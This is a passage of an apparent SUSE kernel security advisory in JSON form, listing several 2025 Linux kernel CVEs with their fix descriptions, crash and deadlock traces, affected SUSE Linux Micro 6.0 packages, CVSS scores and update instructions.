"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: enhance kfd process check in switch partition\n\ncurrent switch partition only check if kfd_processes_table is empty.\nkfd_prcesses_table entry is deleted in kfd_process_notifier_release, but\nkfd_process tear down is in kfd_process_wq_release.\n\nconsider two processes:\n\nProcess A (workqueue) -\u003e kfd_process_wq_release -\u003e Access kfd_node member\nProcess B switch partition -\u003e amdgpu_xcp_pre_partition_switch -\u003e amdgpu_amdkfd_device_fini_sw\n-\u003e kfd_node tear down.\n\nProcess A and B may trigger a race as shown in dmesg log.\n\nThis patch is to resolve the race by adding an atomic kfd_process counter\nkfd_processes_count, it increment as create kfd process, decrement as\nfinish kfd_process_wq_release.\n\nv2: Put kfd_processes_count per kfd_dev, move decrement to kfd_process_destroy_pdds\nand bug fix. (Philip Yang)\n\n[3966658.307702] divide error: 0000 [#1] SMP NOPTI\n[3966658.350818] i10nm_edac\n[3966658.356318] CPU: 124 PID: 38435 Comm: kworker/124:0 Kdump: loaded Tainted\n[3966658.356890] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu]\n[3966658.362839] nfit\n[3966658.366457] RIP: 0010:kfd_get_num_sdma_engines+0x17/0x40 [amdgpu]\n[3966658.366460] Code: 00 00 e9 ac 81 02 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 0f 1f 44 00 00 48 8b 4f 08 48 8b b7 00 01 00 00 8b 81 58 26 03 00 99 \u003cf7\u003e be b8 01 00 00 80 b9 70 2e 00 00 00 74 0b 83 f8 02 ba 02 00 00\n[3966658.380967] x86_pkg_temp_thermal\n[3966658.391529] RSP: 0018:ffffc900a0edfdd8 EFLAGS: 00010246\n[3966658.391531] RAX: 0000000000000008 RBX: ffff8974e593b800 RCX: ffff888645900000\n[3966658.391531] RDX: 0000000000000000 RSI: ffff888129154400 RDI: ffff888129151c00\n[3966658.391532] RBP: ffff8883ad79d400 R08: 0000000000000000 R09: ffff8890d2750af4\n[3966658.391532] R10: 0000000000000018 R11: 0000000000000018 R12: 0000000000000000\n[3966658.391533] R13: ffff8883ad79d400 R14: ffffe87ff662ba00 R15: ffff8974e593b800\n[3966658.391533] FS: 0000000000000000(0000) GS:ffff88fe7f600000(0000) knlGS:0000000000000000\n[3966658.391534] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[3966658.391534] CR2: 0000000000d71000 CR3: 000000dd0e970004 CR4: 0000000002770ee0\n[3966658.391535] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[3966658.391535] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[3966658.391536] PKRU: 55555554\n[3966658.391536] Call Trace:\n[3966658.391674] deallocate_sdma_queue+0x38/0xa0 [amdgpu]\n[3966658.391762] process_termination_cpsch+0x1ed/0x480 [amdgpu]\n[3966658.399754] intel_powerclamp\n[3966658.402831] kfd_process_dequeue_from_all_devices+0x5b/0xc0 [amdgpu]\n[3966658.402908] kfd_process_wq_release+0x1a/0x1a0 [amdgpu]\n[3966658.410516] coretemp\n[3966658.434016] process_one_work+0x1ad/0x380\n[3966658.434021] worker_thread+0x49/0x310\n[3966658.438963] kvm_intel\n[3966658.446041] ? process_one_work+0x380/0x380\n[3966658.446045] kthread+0x118/0x140\n[3966658.446047] ? __kthread_bind_mask+0x60/0x60\n[3966658.446050] ret_from_fork+0x1f/0x30\n[3966658.446053] Modules linked in: kpatch_20765354(OEK)\n[3966658.455310] kvm\n[3966658.464534] mptcp_diag xsk_diag raw_diag unix_diag af_packet_diag netlink_diag udp_diag act_pedit act_mirred act_vlan cls_flower kpatch_21951273(OEK) kpatch_18424469(OEK) kpatch_19749756(OEK)\n[3966658.473462] idxd_mdev\n[3966658.482306] kpatch_17971294(OEK) sch_ingress xt_conntrack amdgpu(OE) amdxcp(OE) amddrm_buddy(OE) amd_sched(OE) amdttm(OE) amdkcl(OE) intel_ifs iptable_mangle tcm_loop target_core_pscsi tcp_diag target_core_file inet_diag target_core_iblock target_core_user target_core_mod coldpgs kpatch_18383292(OEK) ip6table_nat ip6table_filter ip6_tables ip_set_hash_ipportip ip_set_hash_ipportnet ip_set_hash_ipport ip_set_bitmap_port xt_comment iptable_nat nf_nat iptable_filter ip_tables ip_set ip_vs_sh ip_vs_wrr ip_vs_rr ip_vs nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 sn_core_odd(OE) i40e overlay binfmt_misc tun bonding(OE) aisqos(OE) aisqo\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68174",
"url": "https://www.suse.com/security/cve/CVE-2025-68174"
},
{
"category": "external",
"summary": "SUSE Bug 1255327 for CVE-2025-68174",
"url": "https://bugzilla.suse.com/1255327"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68174"
},
{
"cve": "CVE-2025-68176",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68176"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: cadence: Check for the existence of cdns_pcie::ops before using it\n\ncdns_pcie::ops might not be populated by all the Cadence glue drivers. This\nis going to be true for the upcoming Sophgo platform which doesn\u0027t set the\nops.\n\nHence, add a check to prevent NULL pointer dereference.\n\n[mani: reworded subject and description]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68176",
"url": "https://www.suse.com/security/cve/CVE-2025-68176"
},
{
"category": "external",
"summary": "SUSE Bug 1255329 for CVE-2025-68176",
"url": "https://bugzilla.suse.com/1255329"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68176"
},
{
"cve": "CVE-2025-68178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: fix possible deadlock while configuring policy\n\nFollowing deadlock can be triggered easily by lockdep:\n\nWARNING: possible circular locking dependency detected\n6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted\n------------------------------------------------------\ncheck/1334 is trying to acquire lock:\nff1100011d9d0678 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180\n\nbut task is already holding lock:\nff1100011d9d00e0 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #2 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}:\n blk_queue_enter+0x40b/0x470\n blkg_conf_prep+0x7b/0x3c0\n tg_set_limit+0x10a/0x3e0\n cgroup_file_write+0xc6/0x420\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n-\u003e #1 (\u0026q-\u003erq_qos_mutex){+.+.}-{4:4}:\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n wbt_init+0x17e/0x280\n wbt_enable_default+0xe9/0x140\n blk_register_queue+0x1da/0x2e0\n __add_disk+0x38c/0x5d0\n add_disk_fwnode+0x89/0x250\n device_add_disk+0x18/0x30\n virtblk_probe+0x13a3/0x1800\n virtio_dev_probe+0x389/0x610\n really_probe+0x136/0x620\n __driver_probe_device+0xb3/0x230\n driver_probe_device+0x2f/0xe0\n __driver_attach+0x158/0x250\n bus_for_each_dev+0xa9/0x130\n driver_attach+0x26/0x40\n bus_add_driver+0x178/0x3d0\n driver_register+0x7d/0x1c0\n __register_virtio_driver+0x2c/0x60\n virtio_blk_init+0x6f/0xe0\n do_one_initcall+0x94/0x540\n kernel_init_freeable+0x56a/0x7b0\n kernel_init+0x2b/0x270\n ret_from_fork+0x268/0x4c0\n ret_from_fork_asm+0x1a/0x30\n\n-\u003e #0 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}:\n __lock_acquire+0x1835/0x2940\n lock_acquire+0xf9/0x450\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n blk_unregister_queue+0x53/0x180\n __del_gendisk+0x226/0x690\n del_gendisk+0xba/0x110\n sd_remove+0x49/0xb0 [sd_mod]\n device_remove+0x87/0xb0\n device_release_driver_internal+0x11e/0x230\n device_release_driver+0x1a/0x30\n bus_remove_device+0x14d/0x220\n device_del+0x1e1/0x5a0\n __scsi_remove_device+0x1ff/0x2f0\n scsi_remove_device+0x37/0x60\n sdev_store_delete+0x77/0x100\n dev_attr_store+0x1f/0x40\n sysfs_kf_write+0x65/0x90\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nother info that might help us debug this:\n\nChain exists of:\n \u0026q-\u003esysfs_lock --\u003e \u0026q-\u003erq_qos_mutex --\u003e \u0026q-\u003eq_usage_counter(queue)#3\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003erq_qos_mutex);\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003esysfs_lock);\n\nRoot cause is that queue_usage_counter is grabbed with rq_qos_mutex\nheld in blkg_conf_prep(), while queue should be freezed before\nrq_qos_mutex from other context.\n\nThe blk_queue_enter() from blkg_conf_prep() is used to protect against\npolicy deactivation, which is already protected with blkcg_mutex, hence\nconvert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile,\nconsider that blkcg_mutex is held after queue is freezed from policy\ndeactivation, also convert blkg_alloc() to use GFP_NOIO.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68178",
"url": "https://www.suse.com/security/cve/CVE-2025-68178"
},
{
"category": "external",
"summary": "SUSE Bug 1255266 for CVE-2025-68178",
"url": "https://bugzilla.suse.com/1255266"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68178"
},
{
"cve": "CVE-2025-68180",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68180"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Fix NULL deref in debugfs odm_combine_segments\n\nWhen a connector is connected but inactive (e.g., disabled by desktop\nenvironments), pipe_ctx-\u003estream_res.tg will be destroyed. Then, reading\nodm_combine_segments causes kernel NULL pointer dereference.\n\n BUG: kernel NULL pointer dereference, address: 0000000000000000\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 16 UID: 0 PID: 26474 Comm: cat Not tainted 6.17.0+ #2 PREEMPT(lazy) e6a17af9ee6db7c63e9d90dbe5b28ccab67520c6\n Hardware name: LENOVO 21Q4/LNVNB161216, BIOS PXCN25WW 03/27/2025\n RIP: 0010:odm_combine_segments_show+0x93/0xf0 [amdgpu]\n Code: 41 83 b8 b0 00 00 00 01 75 6e 48 98 ba a1 ff ff ff 48 c1 e0 0c 48 8d 8c 07 d8 02 00 00 48 85 c9 74 2d 48 8b bc 07 f0 08 00 00 \u003c48\u003e 8b 07 48 8b 80 08 02 00\u003e\n RSP: 0018:ffffd1bf4b953c58 EFLAGS: 00010286\n RAX: 0000000000005000 RBX: ffff8e35976b02d0 RCX: ffff8e3aeed052d8\n RDX: 00000000ffffffa1 RSI: ffff8e35a3120800 RDI: 0000000000000000\n RBP: 0000000000000000 R08: ffff8e3580eb0000 R09: ffff8e35976b02d0\n R10: ffffd1bf4b953c78 R11: 0000000000000000 R12: ffffd1bf4b953d08\n R13: 0000000000040000 R14: 0000000000000001 R15: 0000000000000001\n FS: 00007f44d3f9f740(0000) GS:ffff8e3caa47f000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000006485c2000 CR4: 0000000000f50ef0\n PKRU: 55555554\n Call Trace:\n \u003cTASK\u003e\n seq_read_iter+0x125/0x490\n ? __alloc_frozen_pages_noprof+0x18f/0x350\n seq_read+0x12c/0x170\n full_proxy_read+0x51/0x80\n vfs_read+0xbc/0x390\n ? __handle_mm_fault+0xa46/0xef0\n ? do_syscall_64+0x71/0x900\n ksys_read+0x73/0xf0\n do_syscall_64+0x71/0x900\n ? count_memcg_events+0xc2/0x190\n ? handle_mm_fault+0x1d7/0x2d0\n ? do_user_addr_fault+0x21a/0x690\n ? exc_page_fault+0x7e/0x1a0\n entry_SYSCALL_64_after_hwframe+0x6c/0x74\n RIP: 0033:0x7f44d4031687\n Code: 48 89 fa 4c 89 df e8 58 b3 00 00 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 1a 5b c3 0f 1f 84 00 00 00 00 00 48 8b 44 24 10 0f 05 \u003c5b\u003e c3 0f 1f 80 00 00 00 00\u003e\n RSP: 002b:00007ffdb4b5f0b0 EFLAGS: 00000202 ORIG_RAX: 0000000000000000\n RAX: ffffffffffffffda RBX: 00007f44d3f9f740 RCX: 00007f44d4031687\n RDX: 0000000000040000 RSI: 00007f44d3f5e000 RDI: 0000000000000003\n RBP: 0000000000040000 R08: 0000000000000000 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000202 R12: 00007f44d3f5e000\n R13: 0000000000000003 R14: 0000000000000000 R15: 0000000000040000\n \u003c/TASK\u003e\n Modules linked in: tls tcp_diag inet_diag xt_mark ccm snd_hrtimer snd_seq_dummy snd_seq_midi snd_seq_oss snd_seq_midi_event snd_rawmidi snd_seq snd_seq_device x\u003e\n snd_hda_codec_atihdmi snd_hda_codec_realtek_lib lenovo_wmi_helpers think_lmi snd_hda_codec_generic snd_hda_codec_hdmi snd_soc_core kvm snd_compress uvcvideo sn\u003e\n platform_profile joydev amd_pmc mousedev mac_hid sch_fq_codel uinput i2c_dev parport_pc ppdev lp parport nvme_fabrics loop nfnetlink ip_tables x_tables dm_cryp\u003e\n CR2: 0000000000000000\n ---[ end trace 0000000000000000 ]---\n RIP: 0010:odm_combine_segments_show+0x93/0xf0 [amdgpu]\n Code: 41 83 b8 b0 00 00 00 01 75 6e 48 98 ba a1 ff ff ff 48 c1 e0 0c 48 8d 8c 07 d8 02 00 00 48 85 c9 74 2d 48 8b bc 07 f0 08 00 00 \u003c48\u003e 8b 07 48 8b 80 08 02 00\u003e\n RSP: 0018:ffffd1bf4b953c58 EFLAGS: 00010286\n RAX: 0000000000005000 RBX: ffff8e35976b02d0 RCX: ffff8e3aeed052d8\n RDX: 00000000ffffffa1 RSI: ffff8e35a3120800 RDI: 0000000000000000\n RBP: 0000000000000000 R08: ffff8e3580eb0000 R09: ffff8e35976b02d0\n R10: ffffd1bf4b953c78 R11: 0000000000000000 R12: ffffd1bf4b953d08\n R13: 0000000000040000 R14: 0000000000000001 R15: 0000000000000001\n FS: 00007f44d3f9f740(0000) GS:ffff8e3caa47f000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 00000006485c2000 CR4: 0000000000f50ef0\n PKRU: 55555554\n\nFix this by checking pipe_ctx-\u003e\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68180",
"url": "https://www.suse.com/security/cve/CVE-2025-68180"
},
{
"category": "external",
"summary": "SUSE Bug 1255252 for CVE-2025-68180",
"url": "https://bugzilla.suse.com/1255252"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68180"
},
{
"cve": "CVE-2025-68183",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68183"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nima: don\u0027t clear IMA_DIGSIG flag when setting or removing non-IMA xattr\n\nCurrently when both IMA and EVM are in fix mode, the IMA signature will\nbe reset to IMA hash if a program first stores IMA signature in\nsecurity.ima and then writes/removes some other security xattr for the\nfile.\n\nFor example, on Fedora, after booting the kernel with \"ima_appraise=fix\nevm=fix ima_policy=appraise_tcb\" and installing rpm-plugin-ima,\ninstalling/reinstalling a package will not make good reference IMA\nsignature generated. Instead IMA hash is generated,\n\n # getfattr -m - -d -e hex /usr/bin/bash\n # file: usr/bin/bash\n security.ima=0x0404...\n\nThis happens because when setting security.selinux, the IMA_DIGSIG flag\nthat had been set early was cleared. As a result, IMA hash is generated\nwhen the file is closed.\n\nSimilarly, IMA signature can be cleared on file close after removing\nsecurity xattr like security.evm or setting/removing ACL.\n\nPrevent replacing the IMA file signature with a file hash, by preventing\nthe IMA_DIGSIG flag from being reset.\n\nHere\u0027s a minimal C reproducer which sets security.selinux as the last\nstep which can also replaced by removing security.evm or setting ACL,\n\n 